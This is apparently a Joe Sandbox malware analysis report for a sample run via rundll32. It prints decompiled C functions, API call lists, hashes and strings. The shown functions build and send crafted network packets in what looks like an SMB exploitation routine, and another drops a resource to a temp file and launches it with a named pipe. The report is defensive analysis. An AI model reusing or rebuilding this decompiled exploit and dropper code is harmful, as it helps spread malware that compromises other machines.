Opcode ID: 0603cf4c1b7d28d75da527e0ea062199e26cb93bb1b9f8f6859c29c4d6258535
Instruction ID: a638d5c4fce011fc7e4ffbb12bcad51f30b872014e3ad10a8af17ed1debd75ae
Opcode Fuzzy Hash: 0603cf4c1b7d28d75da527e0ea062199e26cb93bb1b9f8f6859c29c4d6258535
Instruction Fuzzy Hash: 81F1AE75900346EFDF24DFA8C895BAA7BB4FF48300F408469E944DB292EB79D805CB59

Uniqueness

Uniqueness Score: -1.00%

Function 007B2497 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 199
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E007B2497(void* __ecx, intOrPtr _a4, void** _a8, signed int _a12, intOrPtr _a16) {
				char _v5;
				void* _v12;
				void* __esi;
				void* _t65;
				signed int _t71;
				void* _t73;
				short _t75;
				void* _t84;
				void* _t89;
				void* _t95;
				void* _t100;
				void* _t101;
				void* _t105;
				signed int _t108;
				signed int _t109;
				intOrPtr _t111;
				signed int _t112;
				signed int _t115;
				void* _t120;
				void** _t124;
				void* _t128;
				void* _t131;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;

				_push(__ecx);
				_push(__ecx);
				_v5 = 0;
				_t65 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v12 = _t65;
				if(_t65 == 0) {
					L24:
					return _v5;
				}
				_t105 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
				if(_t105 == 0) {
					L23:
					HeapFree(GetProcessHeap(), 8, _v12);
					goto L24;
				}
				_t124 = _a8;
				_t71 = rand();
				_t108 = 0x14;
				asm("cdq");
				_t109 = 9;
				 *((intOrPtr*)( *_t124 + 0x22)) =  *((intOrPtr*)( *_t124 + 0x22)) + _t71 % _t108;
				_t73 = memcpy(_t105,  *_t124, _t109 << 2);
				__imp__#9(0x1120);
				 *(_t105 + 2) = _t73;
				_t111 = 4;
				 *((intOrPtr*)(_t105 + 0x40)) = 0x10d0;
				 *((intOrPtr*)(_t105 + 0x2c)) = 0x10d0;
				 *((intOrPtr*)(_t105 + 0x34)) = 0x10d0;
				_t75 = 5;
				 *((short*)(_t105 + 0x49)) = _t75;
				 *((short*)(_t105 + 0x4b)) =  *((intOrPtr*)(_t105 + 0x40)) + 7;
				 *((char*)(_t105 + 8)) = 0xa0;
				 *((char*)(_t105 + 0x24)) = 0x13;
				 *((intOrPtr*)(_t105 + 0x28)) = 0;
				 *((intOrPtr*)(_t105 + 0x30)) = 0x3f3c;
				 *((intOrPtr*)(_t105 + 0x38)) = _t111;
				 *((intOrPtr*)(_t105 + 0x3c)) = 0x4c;
				 *((intOrPtr*)(_t105 + 0x44)) = 0x50;
				_t137 = 0;
				 *((short*)(_t105 + 0x50)) = _a12;
				if( *((intOrPtr*)(_t105 + 0x40)) <= 0) {
					L4:
					_t128 = HeapAlloc(GetProcessHeap(), 8, 0x160);
					_a12 = _t128;
					if(_t128 == 0) {
						L22:
						HeapFree(GetProcessHeap(), 8, _t105);
						goto L23;
					}
					_t112 = 9;
					_t84 = memcpy(_t128,  *_a8, _t112 << 2);
					__imp__#9(0x15c);
					_t131 = _a12;
					 *(_t131 + 2) = _t84;
					 *((intOrPtr*)(_t131 + 0x2c)) = 0x114;
					 *((intOrPtr*)(_t131 + 0x3c)) = 0x114;
					 *((char*)(_t131 + 8)) = 0xa1;
					 *((char*)(_t131 + 0x24)) = 0x12;
					 *((intOrPtr*)(_t131 + 0x40)) = 0x48;
					 *((short*)(_t131 + 0x49)) = 0x115;
					_t139 = 0;
					do {
						 *((char*)(_t131 + _t139 + 0x4c)) = rand();
						_t139 = _t139 + 1;
					} while (_t139 <  *((intOrPtr*)(_t131 + 0x3c)));
					_t89 = RtlAllocateHeap(GetProcessHeap(), 8, 0x1284); // executed
					_t140 = _t89;
					_a8 = _t140;
					if(_t140 == 0) {
						L21:
						HeapFree(GetProcessHeap(), 8, _t131);
						goto L22;
					}
					memcpy(_t140, _t105, 0x1124);
					_t46 = _t140 + 0x1124; // 0x1124
					memcpy(_t46, _t131, 0x160);
					_t141 = __imp__#19; // executed
					_t95 =  *_t141(_a4, _t140, 0x111c, 0); // executed
					if(_t95 <= 0) {
						L20:
						HeapFree(GetProcessHeap(), 8, _a8);
						goto L21;
					}
					_t100 =  *_t141(_a4, _a8 + 0x111c, 0x168, 0); // executed
					if(_t100 <= 0) {
						goto L20;
					}
					_a12 = _a12 & 0x00000000;
					_t142 = __imp__#16;
					_push(0);
					_push(0xffff);
					_push(_v12);
					while(1) {
						_t101 =  *_t142(_a4); // executed
						if(_t101 <= 0) {
							break;
						}
						_t115 = _a12 + _t101;
						_a12 = _t115;
						if(_t115 == 0x1193) {
							goto L20;
						}
						_t120 = _v12;
						if( *((intOrPtr*)(_t120 + 9)) != 0) {
							goto L20;
						}
						if(_t115 >= 0x1280) {
							if(_t101 < 0x1c) {
								_v5 = 0;
							} else {
								_v5 = E007B2344(_t101, _t115 - _t101 + _t120, _a16);
							}
							goto L20;
						}
						_push(0);
						_push(0xffff);
						_push(_t120 + _t115);
					}
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					 *((char*)(_t105 + _t137 + 0x54)) = rand();
					_t137 = _t137 + 1;
				} while (_t137 <  *((intOrPtr*)(_t105 + 0x40)));
				goto L4;
			}

0x007b249a
0x007b249b
0x007b24ab
0x007b24b8
0x007b24ba
0x007b24bf
0x007b26ff
0x007b2705
0x007b2705
0x007b24d2
0x007b24d6
0x007b26ec
0x007b26f8
0x00000000
0x007b26fe
0x007b24dc
0x007b24e1
0x007b24e9
0x007b24ea
0x007b24ef
0x007b24f5
0x007b24fd
0x007b24ff
0x007b2505
0x007b250b
0x007b2511
0x007b2514
0x007b2517
0x007b251c
0x007b251d
0x007b2529
0x007b2531
0x007b2535
0x007b2539
0x007b253c
0x007b2543
0x007b2546
0x007b254d
0x007b2554
0x007b2556
0x007b255d
0x007b256f
0x007b2583
0x007b2585
0x007b258a
0x007b26dc
0x007b26e6
0x00000000
0x007b26e6
0x007b2597
0x007b259d
0x007b259f
0x007b25a5
0x007b25a8
0x007b25b1
0x007b25b4
0x007b25b8
0x007b25bc
0x007b25c0
0x007b25c7
0x007b25cb
0x007b25cd
0x007b25d3
0x007b25d7
0x007b25d8
0x007b25eb
0x007b25f1
0x007b25f3
0x007b25f8
0x007b26cc
0x007b26d6
0x00000000
0x007b26d6
0x007b2605
0x007b260f
0x007b2617
0x007b262a
0x007b2630
0x007b2634
0x007b26ba
0x007b26c6
0x00000000
0x007b26c6
0x007b264d
0x007b2651
0x00000000
0x00000000
0x007b2653
0x007b2657
0x007b265d
0x007b265f
0x007b2664
0x007b2694
0x007b2697
0x007b269b
0x00000000
0x00000000
0x007b266c
0x007b266e
0x007b2677
0x00000000
0x00000000
0x007b2679
0x007b2680
0x00000000
0x00000000
0x007b2688
0x007b26a3
0x007b26b6
0x007b26a5
0x007b26b1
0x007b26b1
0x00000000
0x007b26a3
0x007b268a
0x007b268c
0x007b2693
0x007b2693
0x00000000
0x00000000
0x00000000
0x00000000
0x007b255f
0x007b255f
0x007b2565
0x007b2569
0x007b256a
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24AF
HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24B8
GetProcessHeap.KERNEL32(00000008,00001124,74654F20,?,?,?,007B471C,?,?,?,?,?), ref: 007B24CD
HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24D0
rand.MSVCRT ref: 007B24E1
htons.WS2_32(00001120), ref: 007B24FF
rand.MSVCRT ref: 007B255F
GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,007B471C,?,?,?,?,?), ref: 007B2576
HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B257D
htons.WS2_32(0000015C), ref: 007B259F
rand.MSVCRT ref: 007B25CD
GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,007B471C,?,?,?,?,?), ref: 007B25E4
RtlAllocateHeap.NTDLL(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B25EB
memcpy.MSVCRT ref: 007B2605
memcpy.MSVCRT ref: 007B2617
send.WS2_32(?,00000000,0000111C,00000000), ref: 007B2630
send.WS2_32(?,?,00000168,00000000), ref: 007B264D
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B2697
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26BF
HeapFree.KERNEL32(00000000,?,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26C6
GetProcessHeap.KERNEL32(00000008,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26CF
HeapFree.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26D6
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26DF
HeapFree.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26E6
GetProcessHeap.KERNEL32(00000008,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26F1
HeapFree.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26F8

Strings

Oet Uet0Xet, xrefs: 007B249E, 007B2576, 007B25E4, 007B26BF, 007B26CF, 007B26DF, 007B26F1

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$Allocrand$htonsmemcpysend$Allocaterecv
String ID: Oet Uet0Xet
API String ID: 3232356791-3175316637
Opcode ID: e344fa0432be51431c8fa20c006dadf4259aa01b234a4248b33b763804c4c5b9
Instruction ID: 69c27e33b27ef28526efebf5e7cb2d08a889db63e203ce23cafa9034881b3540
Opcode Fuzzy Hash: e344fa0432be51431c8fa20c006dadf4259aa01b234a4248b33b763804c4c5b9
Instruction Fuzzy Hash: 0571B371501346EBDB249FA4CC49FDA7BA4FF48714F048169FA049B692E7B8DC11CB68

Uniqueness

Uniqueness Score: -1.00%

Function 007B21DC Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 129
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E007B21DC(intOrPtr _a4, void** _a8, void* _a12) {
				char _v5;
				void* _v12;
				void* _v16;
				void* _t35;
				void* _t42;
				short _t44;
				void* _t47;
				void* _t50;
				void* _t51;
				signed int _t57;
				signed int _t60;
				void* _t66;
				void* _t74;
				void* _t77;
				void* _t79;

				_v5 = 0;
				_t35 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v12 = _t35;
				if(_t35 == 0) {
					L13:
					return _v5;
				}
				_t66 = HeapAlloc(GetProcessHeap(), 8, 0x2d);
				_v16 = _t66;
				if(_t66 == 0) {
					L12:
					HeapFree(GetProcessHeap(), 8, _v12);
					goto L13;
				}
				_t57 = 9;
				_t42 = memcpy(_t66,  *_a8, _t57 << 2);
				__imp__#9(0x29);
				_t77 = _v16;
				 *(_t77 + 2) = _t42;
				_t44 =  *_a12;
				 *((char*)(_t77 + 8)) = 4;
				 *((char*)(_t77 + 0x24)) = 3;
				 *((short*)(_t77 + 0x25)) = _t44;
				__imp__#19(_a4, _t77, 0x2d, 0); // executed
				if(_t44 > 0) {
					__imp__#16(_a4, _v12, 0xffff, 0); // executed
					if(_t44 > 0) {
						_t47 = _v12;
						if( *((intOrPtr*)(_t47 + 9)) == 0) {
							 *_a12 = 0;
							memset(_t47, 0, 0xffff);
							_t50 = HeapAlloc(GetProcessHeap(), 8, 0x27);
							_a12 = _t50;
							if(_t50 != 0) {
								_t60 = 9;
								_t51 = memcpy(_t50,  *_a8, _t60 << 2);
								__imp__#9(0x23);
								_t79 = _a12;
								 *(_t79 + 2) = _t51;
								 *((char*)(_t79 + 8)) = 0x71;
								__imp__#19(_a4, _t79, 0x27, 0);
								if(_t51 > 0) {
									_t74 = _v12;
									__imp__#16(_a4, _t74, 0xffff, 0);
									if(_t51 > 0 &&  *((intOrPtr*)(_t74 + 9)) == 0) {
										 *((short*)( *_a8 + 0x1c)) = 0;
										_v5 = 1;
									}
								}
								HeapFree(GetProcessHeap(), 8, _t79);
								_t77 = _v16;
							}
						}
					}
				}
				HeapFree(GetProcessHeap(), 8, _t77);
				goto L12;
			}

0x007b21f1
0x007b21fe
0x007b2200
0x007b2205
0x007b233b
0x007b2341
0x007b2341
0x007b2215
0x007b2217
0x007b221c
0x007b232c
0x007b2334
0x00000000
0x007b233a
0x007b2229
0x007b222c
0x007b222e
0x007b2234
0x007b223b
0x007b2242
0x007b2249
0x007b224d
0x007b2251
0x007b2255
0x007b225d
0x007b2271
0x007b2279
0x007b227f
0x007b2286
0x007b2294
0x007b2297
0x007b22a6
0x007b22ac
0x007b22b1
0x007b22ba
0x007b22bf
0x007b22c1
0x007b22c7
0x007b22d2
0x007b22d6
0x007b22da
0x007b22e2
0x007b22e4
0x007b22f2
0x007b22fa
0x007b2309
0x007b230d
0x007b230d
0x007b22fa
0x007b2317
0x007b231d
0x007b231d
0x007b22b1
0x007b2286
0x007b2279
0x007b2326
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74654F20,?,?,?,?,?,?,?,?), ref: 007B21F5
HeapAlloc.KERNEL32(00000000), ref: 007B21FE
GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 007B2210
HeapAlloc.KERNEL32(00000000), ref: 007B2213
htons.WS2_32(00000029), ref: 007B222E
send.WS2_32(?,?,0000002D,00000000), ref: 007B2255
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B2271
memset.MSVCRT ref: 007B2297
GetProcessHeap.KERNEL32(00000008,00000027), ref: 007B22A3
HeapAlloc.KERNEL32(00000000), ref: 007B22A6
htons.WS2_32(00000023), ref: 007B22C1
send.WS2_32(?,?,00000027,00000000), ref: 007B22DA
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B22F2
GetProcessHeap.KERNEL32(00000008,?), ref: 007B2314
HeapFree.KERNEL32(00000000), ref: 007B2317
GetProcessHeap.KERNEL32(00000008,?), ref: 007B2323
HeapFree.KERNEL32(00000000), ref: 007B2326
GetProcessHeap.KERNEL32(00000008,?), ref: 007B2331
HeapFree.KERNEL32(00000000), ref: 007B2334

Strings

Oet Uet0Xet, xrefs: 007B21E3

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsrecvsend$memset
String ID: Oet Uet0Xet
API String ID: 821554539-3175316637
Opcode ID: a90fa31bd2c04184dffd3d8429804829b02606aa4a3881387279d55b19b10ae9
Instruction ID: 9c760ab5c2c29cbcb22cfa03a4f89f7d772ec1cae46543704956c0c9d39572ee
Opcode Fuzzy Hash: a90fa31bd2c04184dffd3d8429804829b02606aa4a3881387279d55b19b10ae9
Instruction Fuzzy Hash: C1418C35A0034AFFEB209FA5DC0AF9E7BA4FF49750F008055F9489B291EA78D905CB65

Uniqueness

Uniqueness Score: -1.00%

Function 007B7146 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 172
memorythreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E007B7146(void* __ecx, void* __esi) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v20;
				void* _v32;
				char _v36;
				struct _PROCESS_INFORMATION _v52;
				struct _STARTUPINFOW _v120;
				short _v1680;
				void _v3728;
				short _v5776;
				void* __ebx;
				void* _t56;
				void* _t57;
				int _t59;
				long* _t60;
				char _t62;
				char* _t64;
				char* _t66;
				void* _t68;
				void* _t72;
				char* _t73;
				int _t90;
				long _t95;
				void* _t99;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				void* _t105;
				int _t109;
				void* _t114;

				_t99 = __ecx;
				E007BA760(0x168c);
				_t95 = 0;
				_v8 = 0;
				_v12 = 0;
				_t7 = (0 | E007B6F7C(_t99, GetCurrentProcess()) != 0x00000000) + 1; // 0x1, executed
				_t56 = E007B8313(_t7,  &_v8,  &_v12); // executed
				if(_t56 != 0) {
					_t57 = 0;
					do {
						_t8 = _t57 + L"C:\\Windows\\"; // 0x3a0043
						_t102 =  *_t8 & 0x0000ffff;
						 *(_t114 + _t57 - 0x68c) = _t102;
						_t57 = _t57 + 2;
					} while (_t102 != 0);
					_t59 = GetTempFileNameW( &_v1680, 0, 0,  &_v1680); // executed
					if(_t59 == 0) {
						L16:
						_t103 = _v12;
						_t60 = _v8;
						if(_t103 == _t95) {
							L18:
							_t62 = RtlFreeHeap(GetProcessHeap(), _t95, _v8); // executed
							return _t62;
						} else {
							goto L17;
						}
						do {
							L17:
							 *_t60 = _t95;
							_t60 =  &(_t60[0]);
							_t103 = _t103 - 1;
						} while (_t103 != 0);
						goto L18;
					}
					_v36 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t64 =  &_v36;
					__imp__CoCreateGuid(_t64, _t105); // executed
					if(_t64 < 0) {
						L15:
						goto L16;
					}
					_t66 =  &_v36;
					_v16 = 0;
					__imp__StringFromCLSID(_t66,  &_v16); // executed
					if(_t66 < 0) {
						goto L15;
					}
					_t68 = E007B6FAF(_v12,  &_v1680, _v8); // executed
					if(_t68 == 0) {
						L14:
						__imp__CoTaskMemFree(_v16);
						_t95 = 0;
						goto L15;
					}
					wsprintfW( &_v3728, L"\\\\.\\pipe\\%ws", _v16);
					_t72 = CreateThread(0, 0, E007B6FFE,  &_v3728, 0, 0); // executed
					_v20 = _t72;
					if(_t72 != 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t109 = 0x44;
						memset( &_v120, 0, _t109);
						_v120.wShowWindow = 0;
						_v120.cb = _t109;
						wsprintfW( &_v5776, L"\"%ws\" %ws",  &_v1680,  &_v3728);
						_t90 = CreateProcessW( &_v1680,  &_v5776, 0, 0, 0, 0x8000000, 0, 0,  &_v120,  &_v52); // executed
						if(_t90 != 0) {
							WaitForSingleObject(_v52, 0xea60);
							E007B6CC8( *0x7c7b80);
							TerminateThread(_v20, 0); // executed
						}
						CloseHandle(_v20);
					}
					_t104 = _v12;
					_t73 = _v8;
					if(_t104 == 0) {
						L13:
						E007B6FAF(_v12,  &_v1680, _v8); // executed
						DeleteFileW( &_v1680); // executed
						goto L14;
					} else {
						do {
							 *_t73 = 0;
							_t73 = _t73 + 1;
							_t104 = _t104 - 1;
						} while (_t104 != 0);
						goto L13;
					}
				}
				return _t56;
			}

0x007b7146
0x007b714e
0x007b715b
0x007b715e
0x007b7161
0x007b7177
0x007b717a
0x007b7181
0x007b7187
0x007b7189
0x007b7189
0x007b7189
0x007b7190
0x007b7198
0x007b719b
0x007b71aa
0x007b71b2
0x007b7318
0x007b7318
0x007b731b
0x007b7320
0x007b7328
0x007b7333
0x00000000
0x00000000
0x00000000
0x00000000
0x007b7322
0x007b7322
0x007b7322
0x007b7324
0x007b7325
0x007b7325
0x00000000
0x007b7322
0x007b71bb
0x007b71c1
0x007b71c2
0x007b71c3
0x007b71c4
0x007b71c8
0x007b71d0
0x007b7317
0x00000000
0x007b7317
0x007b71da
0x007b71de
0x007b71e1
0x007b71e9
0x00000000
0x00000000
0x007b71fc
0x007b7203
0x007b730c
0x007b730f
0x007b7315
0x00000000
0x007b7315
0x007b721f
0x007b7236
0x007b723c
0x007b7241
0x007b724c
0x007b724d
0x007b724e
0x007b7251
0x007b7252
0x007b7259
0x007b7260
0x007b727e
0x007b7281
0x007b72a6
0x007b72ae
0x007b72b8
0x007b72c4
0x007b72cd
0x007b72cd
0x007b72d6
0x007b72d6
0x007b72dc
0x007b72df
0x007b72e5
0x007b72ed
0x007b72fa
0x007b7306
0x00000000
0x007b72e7
0x007b72e7
0x007b72e7
0x007b72e9
0x007b72ea
0x007b72ea
0x00000000
0x007b72e7
0x007b72e5
0x007b733b

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,007B7AF8), ref: 007B7164

Part of subcall function 007B6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,007B7170,00000000,?,007B7AF8), ref: 007B6F8E
Part of subcall function 007B6F7C: GetProcAddress.KERNEL32(00000000), ref: 007B6F95

Part of subcall function 007B8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 007B832A
Part of subcall function 007B8313: LoadResource.KERNEL32(00000000), ref: 007B8341
Part of subcall function 007B8313: LockResource.KERNEL32(00000000), ref: 007B8350
Part of subcall function 007B8313: SizeofResource.KERNEL32(00000000), ref: 007B8368
Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 007B8384
Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007B838D
Part of subcall function 007B8313: memcpy.MSVCRT ref: 007B839C
Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 007B83B9
Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B83BC
Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 007B840A
Part of subcall function 007B8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B840D

GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,007B7AF8), ref: 007B71AA
CoCreateGuid.OLE32(?,746543E0,?,007B7AF8), ref: 007B71C8
StringFromCLSID.OLE32(?,?,?,007B7AF8), ref: 007B71E1
wsprintfW.USER32 ref: 007B721F
CreateThread.KERNELBASE ref: 007B7236
memset.MSVCRT ref: 007B7259
wsprintfW.USER32 ref: 007B7281
CreateProcessW.KERNELBASE ref: 007B72A6
WaitForSingleObject.KERNEL32(?,0000EA60), ref: 007B72B8

Part of subcall function 007B6CC8: EnterCriticalSection.KERNEL32(?,007B7B03), ref: 007B6CCD
Part of subcall function 007B6CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 007B6CD9
Part of subcall function 007B6CC8: LeaveCriticalSection.KERNEL32(?), ref: 007B6CE0

TerminateThread.KERNELBASE(?,00000000), ref: 007B72CD
CloseHandle.KERNEL32(?), ref: 007B72D6
DeleteFileW.KERNELBASE(?,?,?), ref: 007B7306
CoTaskMemFree.OLE32(?,?,?,?,007B7AF8), ref: 007B730F
GetProcessHeap.KERNEL32(00000000,?,?,007B7AF8), ref: 007B732C
RtlFreeHeap.NTDLL(00000000,?,007B7AF8), ref: 007B7333

Strings

Oet Uet0Xet, xrefs: 007B732C
"%ws" %ws, xrefs: 007B7278
\\.\pipe\%ws, xrefs: 007B7219

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
String ID: Oet Uet0Xet$"%ws" %ws$\\.\pipe\%ws
API String ID: 1475553426-498548874
Opcode ID: fc8bc620eabac648876843b31d6116a9da091da82ed8d37f836cb655fa19de60
Instruction ID: 53a4f09d9d3e05da2766e42580e710a2dc3dead5842ec617e6826e38384946b6
Opcode Fuzzy Hash: fc8bc620eabac648876843b31d6116a9da091da82ed8d37f836cb655fa19de60
Instruction Fuzzy Hash: 8E51E9B590021DBFDF119BE4DC88EEEB7BDEB48304F148665F605E3111EA389E449B24

Uniqueness

Uniqueness Score: -1.00%

Function 007B46C7 Relevance: 31.8, APIs: 20, Strings: 1, Instructions: 333
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E007B46C7(void* __ecx, intOrPtr _a4, void* _a8, char _a12, signed short* _a16, char _a20) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				void* __edi;
				void* _t146;
				intOrPtr _t151;
				void* _t160;
				intOrPtr _t172;
				short _t173;
				signed short _t174;
				short _t202;
				short _t205;
				short _t218;
				void* _t228;
				signed int _t242;
				void* _t248;
				void* _t249;
				void* _t251;
				void _t252;

				_t228 = __ecx;
				_v8 = 0xc0c0c0c;
				_t251 = HeapAlloc(GetProcessHeap(), 8, 0x90);
				_v12 = _t251;
				if(_t251 == 0) {
					_v8 = 0xbadf00d;
				} else {
					_t246 = _a16;
					 *_t251 = 0xf00d;
					_t146 = E007B2497(_t228, _a4,  &_a12,  *_a16 & 0x0000ffff,  &_v12, _a20); // executed
					if(_t146 != 0) {
						_v20 =  *(_a12 + 0x22) & 0x0000ffff;
						_t151 = E007B3449( &_v12, _a20);
						_v16 = _t151;
						if(_t151 != 0xffffffff) {
							if(_t151 != 0) {
								_t252 = 0;
								while(E007B29A2(_a4,  &_a12,  *_t246 & 0x0000ffff,  &_v12) != 0) {
									if(E007B21DC(_a4,  &_a12, _t246) == 0) {
										L12:
										_t251 = _v12;
									} else {
										Sleep(0x7d0);
										if(E007B2191( &_a12, _a4, _a8, _t246) == 0) {
											_v8 = 0xbadf00d;
											goto L12;
										} else {
											_t252 = _t252 + 1;
											if(_t252 < 0x10) {
												_t246 = _a16;
												continue;
											} else {
												goto L12;
											}
										}
									}
									goto L13;
								}
								_t251 = _v12;
								goto L16;
							} else {
								if(E007B2E12(_a4, _a12,  *_t246 & 0x0000ffff) != 0) {
									L16:
									_v8 = 0xbadf00d;
									if(E007B317C(_t228, _a4,  &_a12,  *_t246 & 0x0000ffff) == 0) {
										goto L13;
									} else {
										_t160 = HeapAlloc(GetProcessHeap(), 8, 0x100);
										_a8 = _t160;
										if(_t160 == 0) {
											goto L13;
										} else {
											if(_v16 == 0) {
												L28:
												if(_a20 == 5 && 0 ==  *_t251) {
													 *((short*)(_t251 + 0x6c)) = 0x1010;
													 *((char*)(_t251 + 0x6e)) = 0x10;
													 *(_t251 + 0x50) = 0x28e0;
													 *((short*)(_t251 + 0x52)) = 0x7068;
													 *((short*)(_t251 + 0x54)) = 0x8078;
													 *((short*)(_t251 + 0x56)) = 0x9490;
													 *((char*)(_t251 + 0x58)) = 0xaa;
													 *(_t251 + 0x59) = 0xb4b8;
													 *((short*)(_t251 + 0x5c)) = 0xbaa0;
													 *((short*)(_t251 + 0x66)) = 0x4c40;
													 *((char*)(_t251 + 0x68)) = 0x68;
													 *((char*)(_t251 + 0x65)) = 0x10;
												}
												_t229 =  *(_t251 + 0x6d) & 0x000000ff;
												asm("cdq");
												asm("cdq");
												_t242 = (( *(_t251 + 0x50) & 0x000000ff) + ( *(_t251 + 0x6d) & 0x000000ff) + 8) % ( *(_t251 + 0x6d) & 0x000000ff) % _t229;
												 *(_t251 + 0x8a) = _t242;
												 *((short*)(_t251 + 0x8c)) = _t242 + 0xd08;
												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x13);
												if(_t248 == 0) {
													goto L23;
												} else {
													 *((short*)(_t248 + 1)) = 0;
													 *((short*)(_t248 + 3)) = 1;
													 *((short*)(_t248 + 5)) = 0;
													 *((short*)(_t248 + 7)) = 0;
													 *((short*)(_t248 + 9)) = 0;
													 *((short*)(_t248 + 0xb)) = 1;
													_t202 = 0x34;
													 *((short*)(_t248 + 0xd)) = _t202;
													 *_t248 = 8;
													 *((short*)(_t248 + 0xf)) = ( *(_t251 + 0x59) & 0x000000ff) +  *((intOrPtr*)(_t251 + 0x8c));
													_t205 = 2;
													 *((short*)(_t248 + 0x11)) = _t205;
													if(E007B33A4(_t229, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t205) == 0) {
														goto L22;
													} else {
														 *(_a12 + 0x22) = _v20;
														goto L21;
													}
													L38:
													HeapFree(GetProcessHeap(), 8, _a8);
													goto L13;
												}
												goto L41;
											} else {
												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x27);
												if(_t248 != 0) {
													 *((intOrPtr*)(_t248 + 8)) = 1;
